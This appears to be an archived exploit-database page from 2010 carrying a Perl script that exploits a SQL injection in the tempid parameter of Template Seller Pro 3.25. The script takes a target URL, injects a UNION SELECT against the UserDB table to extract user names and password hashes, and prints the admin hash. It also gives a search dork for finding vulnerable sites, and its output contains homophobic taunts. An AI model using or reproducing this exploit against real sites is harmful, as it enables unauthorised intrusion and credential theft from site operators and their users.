Template Seller Pro 3.25 (tempid) Remote SQL Injection Vulne
Posted on 23 April 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Template Seller Pro 3.25 (tempid) Remote SQL Injection Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==================================================================== Template Seller Pro 3.25 (tempid) Remote SQL Injection Vulnerability ==================================================================== #!/usr/bin/perl -w # Template Seller Pro 3.25 (tempid) Remote SQL Injection Vulnerability # Author : v3n0m # Contact : v3n0m666[at]live[dot]com # Site : http://yogyacarderlink.web.id/ # Group : YOGYACARDERLINK # Date : April, 23-2010 GMT +7:00 Jakarta, Indonesia # Software : AlstraSoft Template Seller Pro # Version : 3.25 Other versions may also be affected # Price : $260 USD # Vendor : http://www.alstrasoft.com/ # Greetz : All Yogyacarderlink & devilzc0de Crews # Thx : c4uR (lo emang hacker martabak banget ur, gw salute!!) # ShoutZ : elicha Cristia [ take care you there honey :) ] sub clear{ system(($^O eq 'MSWin32') ? 'cls' : 'clear'); } clear(); print "|----------------------------------------------------| "; print "| 'Template Seller Pro 3.25 Remote SQL Injector' | "; print "| Coded by : v3n0m | "; print "| Greetz : Yogyacarderlink Crew | "; print "| Dork : allinurl:fullview.php?tempid= | "; print "| | "; print "| www.yogyacarderlink.web.id | "; print "| | "; print "|--------------------------------------[ elicha ]----| "; use LWP::UserAgent; print " Insert Target:[http://wwww.target.com/path/]: "; chomp(my $target=<STDIN>); print " [!] Exploiting Progress... "; print " "; #Nama Column $elicha="group_concat(user_name,char(58),user_password)v3n0m"; #Nama Table $table="UserDB"; $b = LWP::UserAgent->new() or die "Could not initialize browser "; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $host = $target . "fullview.php?tempid=-9999+union+all+select+1,".$elicha."3,4,5,6,7+from/**/".$table."+--+"; $res = $b->request(HTTP::Request->new(GET=>$host)); $answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){ print " [+] Admin Hash : $1 "; print "[+] Success !! Check target for details... "; print " "; print "Attention: "; print "v3n0m emang paling ganteng se-jabotabek "; print "Yang kaga setuju/protes = GAY !! "; print " "; } else{print " [-] wah gagal bro (Belom Cebok tangan lo)... "; } # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-04-23]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>